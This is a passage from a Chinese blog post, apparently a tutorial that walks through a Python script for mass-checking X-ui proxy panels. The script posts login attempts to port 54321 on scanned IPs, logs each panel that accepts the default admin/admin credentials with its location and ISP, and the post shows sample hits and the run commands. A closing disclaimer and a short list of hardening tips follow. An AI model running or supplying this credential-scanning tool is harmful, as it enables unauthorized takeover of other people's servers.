</span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">process_ip</span><span class="p">(</span><span class="n">ip</span><span class="p">):</span>
</span></span><span class="line"><span class="cl">    <span class="n">url</span> <span class="o">=</span> <span class="s2">&#34;http://&#34;</span> <span class="o">+</span> <span class="n">ip</span> <span class="o">+</span> <span class="s2">&#34;:54321/login&#34;</span>
</span></span><span class="line"><span class="cl">    <span class="k">try</span><span class="p">:</span>
</span></span><span class="line"><span class="cl">        <span class="n">r</span> <span class="o">=</span> <span class="n">requests</span><span class="o">.</span><span class="n">post</span><span class="p">(</span><span class="n">url</span><span class="p">,</span> <span class="n">data</span><span class="o">=</span><span class="n">data</span><span class="p">,</span> <span class="n">timeout</span><span class="o">=</span><span class="mi">2</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">        <span class="k">if</span> <span class="n">r</span><span class="o">.</span><span class="n">status_code</span> <span class="o">==</span> <span class="mi">200</span><span class="p">:</span>
</span></span><span class="line"><span class="cl">            <span class="k">try</span><span class="p">:</span>
</span></span><span class="line"><span class="cl">                <span class="n">response_data</span> <span class="o">=</span> <span class="n">r</span><span class="o">.</span><span class="n">json</span><span class="p">()</span>
</span></span><span class="line"><span class="cl">                <span class="k">if</span> <span class="nb">isinstance</span><span class="p">(</span><span class="n">response_data</span><span class="p">,</span> <span class="nb">dict</span><span class="p">)</span> <span class="ow">and</span> <span class="n">response_data</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="s2">&#34;success&#34;</span><span class="p">):</span>
</span></span><span class="line"><span class="cl">                    <span class="n">ip_info</span> <span class="o">=</span> <span class="n">get_ip_info</span><span class="p">(</span><span class="n">ip</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">                    <span class="nb">print</span><span class="p">(</span><span class="n">ip</span> <span class="o">+</span> <span class="s1">&#39; Successful (&#39;</span> <span class="o">+</span> <span class="n">ip_info</span> <span class="o">+</span> <span class="s1">&#39;)&#39;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">                    <span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="s2">&#34;result.txt&#34;</span><span class="p">,</span> <span class="s2">&#34;a&#34;</span><span class="p">)</span> <span class="k">as</span> <span class="n">result</span><span class="p">:</span>
</span></span><span class="line"><span class="cl">                        <span class="n">result</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="n">ip</span> <span class="o">+</span> <span class="s1">&#39; (&#39;</span> <span class="o">+</span> <span class="n">ip_info</span> <span class="o">+</span> <span class="s1">&#39;)</span><span class="se">\n</span><span class="s1">&#39;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">                <span class="k">else</span><span class="p">:</span>
</span></span><span class="line"><span class="cl">                    <span class="nb">print</span><span class="p">(</span><span class="n">ip</span> <span class="o">+</span> <span class="s1">&#39; Def&#39;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">            <span class="k">except</span> <span class="ne">ValueError</span><span class="p">:</span>
</span></span><span class="line"><span class="cl">                <span class="nb">print</span><span class="p">(</span><span class="s2">&#34;Invalid JSON response from:&#34;</span><span class="p">,</span> <span class="n">url</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">        <span class="k">else</span><span class="p">:</span>
</span></span><span class="line"><span class="cl">            <span class="nb">print</span><span class="p">(</span><span class="n">ip</span> <span class="o">+</span> <span class="s1">&#39; Def&#39;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">    <span class="k">except</span> <span class="n">requests</span><span class="o">.</span><span class="n">exceptions</span><span class="o">.</span><span class="n">RequestException</span><span class="p">:</span>
</span></span><span class="line"><span class="cl">        <span class="k">try</span><span class="p">:</span>
</span></span><span class="line"><span class="cl">            <span class="n">url</span> <span class="o">=</span> <span class="s2">&#34;https://&#34;</span> <span class="o">+</span> <span class="n">ip</span> <span class="o">+</span> <span class="s2">&#34;:54321/login&#34;</span>
</span></span><span class="line"><span class="cl">            <span class="n">r</span> <span class="o">=</span> <span class="n">requests</span><span class="o">.</span><span class="n">post</span><span class="p">(</span><span class="n">url</span><span class="p">,</span> <span class="n">data</span><span class="o">=</span><span class="n">data</span><span class="p">,</span> <span class="n">timeout</span><span class="o">=</span><span class="mi">2</span><span class="p">,</span> <span class="n">verify</span><span class="o">=</span><span class="kc">False</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">            <span class="k">if</span> <span class="n">r</span><span class="o">.</span><span class="n">status_code</span> <span class="o">==</span> <span class="mi">200</span><span class="p">:</span>
</span></span><span class="line"><span class="cl">                <span class="k">try</span><span class="p">:</span>
</span></span><span class="line"><span class="cl">                    <span class="n">response_data</span> <span class="o">=</span> <span class="n">r</span><span class="o">.</span><span class="n">json</span><span class="p">()</span>
</span></span><span class="line"><span class="cl">                    <span class="k">if</span> <span class="nb">isinstance</span><span class="p">(</span><span class="n">response_data</span><span class="p">,</span> <span class="nb">dict</span><span class="p">)</span> <span class="ow">and</span> <span class="n">response_data</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="s2">&#34;success&#34;</span><span class="p">):</span>
</span></span><span class="line"><span class="cl">                        <span class="n">ip_info</span> <span class="o">=</span> <span class="n">get_ip_info</span><span class="p">(</span><span class="n">ip</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">                        <span class="nb">print</span><span class="p">(</span><span class="n">ip</span> <span class="o">+</span> <span class="s1">&#39; Successful (&#39;</span> <span class="o">+</span> <span class="n">ip_info</span> <span class="o">+</span> <span class="s1">&#39;)&#39;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">                        <span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="s2">&#34;result.txt&#34;</span><span class="p">,</span> <span class="s2">&#34;a&#34;</span><span class="p">)</span> <span class="k">as</span> <span class="n">result</span><span class="p">:</span>
</span></span><span class="line"><span class="cl">                            <span class="n">result</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="n">ip</span> <span class="o">+</span> <span class="s1">&#39; (&#39;</span> <span class="o">+</span> <span class="n">ip_info</span> <span class="o">+</span> <span class="s1">&#39;)</span><span class="se">\n</span><span class="s1">&#39;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">                    <span class="k">else</span><span class="p">:</span>
</span></span><span class="line"><span class="cl">                        <span class="nb">print</span><span class="p">(</span><span class="n">ip</span> <span class="o">+</span> <span class="s1">&#39; Def&#39;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">                <span class="k">except</span> <span class="ne">ValueError</span><span class="p">:</span>
</span></span><span class="line"><span class="cl">                    <span class="nb">print</span><span class="p">(</span><span class="s2">&#34;Invalid JSON response from:&#34;</span><span class="p">,</span> <span class="n">url</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">            <span class="k">else</span><span class="p">:</span>
</span></span><span class="line"><span class="cl">                <span class="nb">print</span><span class="p">(</span><span class="n">ip</span> <span class="o">+</span> <span class="s1">&#39; Def&#39;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">        <span class="k">except</span> <span class="n">requests</span><span class="o">.</span><span class="n">exceptions</span><span class="o">.</span><span class="n">RequestException</span><span class="p">:</span>
</span></span><span class="line"><span class="cl">            <span class="nb">print</span><span class="p">(</span><span class="n">ip</span> <span class="o">+</span> <span class="s1">&#39; Def&#39;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="k">if</span> <span class="vm">__name__</span> <span class="o">==</span> <span class="s2">&#34;__main__&#34;</span><span class="p">:</span>
</span></span><span class="line"><span class="cl">    <span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="s2">&#34;results.txt&#34;</span><span class="p">,</span> <span class="s2">&#34;r&#34;</span><span class="p">)</span> <span class="k">as</span> <span class="n">file</span><span class="p">:</span>
</span></span><span class="line"><span class="cl">        <span class="n">ips</span> <span class="o">=</span> <span class="p">[</span><span class="n">line</span><span class="o">.</span><span class="n">split</span><span class="p">(</span><span class="s2">&#34;Host: &#34;</span><span class="p">)[</span><span class="mi">1</span><span class="p">]</span><span class="o">.</span><span class="n">split</span><span class="p">(</span><span class="s2">&#34; &#34;</span><span class="p">)[</span><span class="mi">0</span><span class="p">]</span> <span class="k">for</span> <span class="n">line</span> <span class="ow">in</span> <span class="n">file</span> <span class="k">if</span> <span class="nb">len</span><span class="p">(</span><span class="n">line</span><span class="o">.</span><span class="n">split</span><span class="p">(</span><span class="s2">&#34;Host: &#34;</span><span class="p">))</span> <span class="o">&gt;=</span> <span class="mi">2</span><span class="p">]</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">    <span class="k">with</span> <span class="n">ThreadPoolExecutor</span><span class="p">()</span> <span class="k">as</span> <span class="n">executor</span><span class="p">:</span>
</span></span><span class="line"><span class="cl">        <span class="n">executor</span><span class="o">.</span><span class="n">map</span><span class="p">(</span><span class="n">process_ip</span><span class="p">,</span> <span class="n">ips</span><span class="p">)</span>
</span></span></code></pre></td></tr></table>
</div>
</div><p>其作用大概为:</p>
<ol>
<li>获取 <code>results.txt</code> 内 IP</li>
<li>向上面获取到的 IP 的 54321 端口发送 Post 数据</li>
<li>当返回成功时，自动保存在 <code>result.txt</code> 文件中，并根据 API 获取 ISP 信息</li>
</ol>
<p><strong>PS：本脚本作者并不是我，原作者不想公开名字</strong></p>
<p>保存好后，安装下 Python 以及依赖 (Debian 系列系统)</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">apt install python3-pip python3 -y
</span></span><span class="line"><span class="cl">pip install requests
</span></span></code></pre></td></tr></table>
</div>
</div><p>随后，运行 <code>python3 scan.py</code> 即可开始扫描！</p>
<h3 id="出结果咯">出结果咯</h3>
<p>一般情况下，结果会输出在 <code>result.txt</code> 文件下</p>
<p>当 Python 测活步骤运行完时，可以查看该文件获取到被扫描的 X-ui</p>
<p>格式为:</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span><span class="lnt">3
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">20.244.7.x (India, Maharashtra, Pune, ISP: Microsoft Corporation)
</span></span><span class="line"><span class="cl">4.241.173.x (Japan, Tokyo, Tokyo, ISP: Microsoft Corporation)
</span></span><span class="line"><span class="cl">20.243.2.x (Japan, Tokyo, Tokyo, ISP: Microsoft Corporation)
</span></span></code></pre></td></tr></table>
</div>
</div><p>前面是 IP，括号内的为地区及 ISP 信息</p>
<p>随后，你就可以登录 http://IP:54321 看看最终的结果了，被扫描到的 X-ui 帐号密码均为 <code>admin</code></p>
<h2 id="后记">后记</h2>
<p>请勿将本文教程用于非法扫描及爆破，由于使用者自身意愿导致的财产损失我们不负责！</p>
<p>请将你的 X-ui 面板做好防护！</p>
<ul>
<li>使用第三方 X-ui 修改版</li>
<li>开启安全入口</li>
<li>设置 Https</li>
<li>设置强帐密</li>
</ul>

</section>


    <footer class="article-footer">
    

    
    <section class="article-copyright">
        <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-copyright" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <circle cx="12" cy="12" r="9" />
  <path d="M14.5 9a3.5 4 0 1 0 0 6" />
</svg>



        <span>Licensed under CC BY-NC-SA 4.0</span>
    </section>
    </footer>


    
</article>

    

    

<aside class="related-content--wrapper">
    <h2 class="section-title">相关文章</h2>
    <div class="related-content">
        <div class="flex article-list--tile">
            
                
<article class="has-image">
    <a href="/p/vps-openvpn/">
        
        
            <div class="article-image">
                <img src="/p/vps-openvpn/image.9b09ff38c582843773f2528ad50c4e65_hu6ea7251c795424c230b58882867c5222_99390_250x150_fill_box_smart1_3.png" 
                        width="250" 
                        height="150" 
                        loading="lazy"
                        alt="Featured image of post 在VPS中使用OPENVPN内置代理"
                        data-key="vps-openvpn" 
                        data-hash="md5-mwn/OMWChDdz8lKK1QxOZQ==">
                
            </div>
        

        <div class="article-details">
            <h2 class="article-title">在VPS中使用OPENVPN内置代理</h2>
        </div>
    </a>
</article>

            
                
<article class="has-image">
    <a href="/p/pgptogithub/">
        
        
            <div class="article-image">
                <img src="/p/pgptogithub/_hu5438825b9b6d1014226d20d231e650c2_814630_a23075d230bc476911f3b7d6425052bf.jpg" 
                        width="250" 
                        height="150" 
                        loading="lazy"
                        alt="Featured image of post 使用pgp向github提交签名commit"
                        data-key="pgptogithub" 
                        data-hash="md5-qYY/0YEDRcWiI8474cSgZQ==">
                
            </div>
        

        <div class="article-details">
            <h2 class="article-title">使用pgp向github提交签名commit</h2>
        </div>
    </a>
</article>

            
                
<article class="has-image">
    <a href="/p/homecloud/">
        
        
            <div class="article-image">
                <img src="/p/homecloud/_hudad6c46779871adc6fa6420f39d139dd_94796_f946a9a6cb61748f976faab9f93381a5.jpg" 
                        width="250" 
                        height="150" 
                        loading="lazy"
                        alt="Featured image of post HomeCloud 家庭云 折腾心得"
                        data-key="homecloud" 
                        data-hash="md5-gizGXSSaeEWe3XmNxK7wsw==">
                
            </div>
        

        <div class="article-details">
            <h2 class="article-title">HomeCloud 家庭云 折腾心得</h2>
        </div>
    </a>
</article>

            
                
<article class="has-image">
    <a href="/p/fulltclash/">
        
        
            <div class="article-image">
                <img src="/p/fulltclash/image.224ddeb23a43497c54234f6454bcedd1_hue25eb37f3aa55237956a176ec4fdb169_35665_250x150_fill_box_smart1_3.png" 
                        width="250" 
                        height="150" 
                        loading="lazy"
                        alt="Featured image of post FullTclash 搭建方法"
                        data-key="fulltclash" 
                        data-hash="md5-Ik3esjpDSXxUI09kVLzt0Q==">
                
            </div>
        

        <div class="article-details">
            <h2 class="article-title">FullTclash 搭建方法</h2>
        </div>
    </a>
</article>

            
                
<article class="has-image">
    <a href="/p/nodepanels/">
        
        
            <div class="article-image">
                <img src="/p/nodepanels/image-12.8e17f83342ea0f6d6e5a653be01ea1d2_hu216a183f3fc2428818c8b9abaaf23757_5145_250x150_fill_box_smart1_3.png" 
                        width="250" 
                        height="150" 
                        loading="lazy"
                        alt="Featured image of post Nodepanels-一个免费的双平台探针"
                        data-key="nodepanels" 
                        data-hash="md5-jhf4M0LqD21uWmU74B6h0g==">
                
            </div>
        

        <div class="article-details">
            <h2 class="article-title">Nodepanels-一个免费的双平台探针</h2>
        </div>
    </a>
</article>

            
        </div>
    </div>
</aside>

     
    
        
    

    <footer class="site-footer">
    <section class="copyright">
        &copy; 
        
        2024 HighPing们の小小藏身地
    </section>
    
    <section class="powerby">
        Built with <a href="https://gohugo.io/" target="_blank" rel="noopener">Hugo</a> <br />
        主题 <b><a href="https://github.com/CaiJimmy/hugo-theme-stack" target="_blank" rel="noopener" data-version="3.21.0">Stack</a></b> 由 <a href="https://jimmycai.com" target="_blank" rel="noopener">Jimmy</a> 设计
    </section>
</footer>


    
<div class="pswp" tabindex="-1" role="dialog" aria-hidden="true">

    
    <div class="pswp__bg"></div>

    
    <div class="pswp__scroll-wrap">

        
        <div class="pswp__container">
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
        </div>

        
        <div class="pswp__ui pswp__ui--hidden">

            <div class="pswp__top-bar">

                

                <div class="pswp__counter"></div>

                <button class="pswp__button pswp__button--close" title="Close (Esc)"></button>

                <button class="pswp__button pswp__button--share" title="Share"></button>

                <button class="pswp__button pswp__button--fs" title="Toggle fullscreen"></button>

                <button class="pswp__button pswp__button--zoom" title="Zoom in/out"></button>

                
                
                <div class="pswp__preloader">
                    <div class="pswp__preloader__icn">
                        <div class="pswp__preloader__cut">
                            <div class="pswp__preloader__donut"></div>
                        </div>
                    </div>
                </div>
            </div>

            <div class="pswp__share-modal pswp__share-modal--hidden pswp__single-tap">
                <div class="pswp__share-tooltip"></div>
            </div>

            <button class="pswp__button pswp__button--arrow--left" title="Previous (arrow left)">
            </button>

            <button class="pswp__button pswp__button--arrow--right" title="Next (arrow right)">
            </button>

            <div class="pswp__caption">
                <div class="pswp__caption__center"></div>
            </div>

        </div>

    </div>

</div><script 
                src="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe.min.js"integrity="sha256-ePwmChbbvXbsO02lbM3HoHbSHTHFAeChekF1xKJdleo="crossorigin="anonymous"
                defer
                >
            </script><script 
                src="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe-ui-default.min.js"integrity="sha256-UKkzOn/w1mBxRmLLGrSeyB4e1xbrp4xylgAWb3M42pU="crossorigin="anonymous"
                defer
                >
            </script><link 
                rel="stylesheet" 
                href="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/default-skin/default-skin.min.css"crossorigin="anonymous"
            ><link 
                rel="stylesheet" 
                href="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe.min.css"crossorigin="anonymous"
            >

            </main>
        </div>
        <script 
                src="https://cdn.jsdelivr.net/npm/node-vibrant@3.1.6/dist/vibrant.min.js"integrity="sha256-awcR2jno4kI5X0zL8ex0vi2z&#43;KMkF24hUW8WePSA9HM="crossorigin="anonymous"
                
                >
            </script><script type="text/javascript" src="/ts/main.js" defer></script>
<script>
    (function () {
        const customFont = document.createElement('link');
        customFont.href = "https://fonts.googleapis.com/css2?family=Lato:wght@300;400;700&display=swap";

        customFont.type = "text/css";
        customFont.rel = "stylesheet";

        document.head.appendChild(customFont);
    }());
</script>

    </body>
</html>
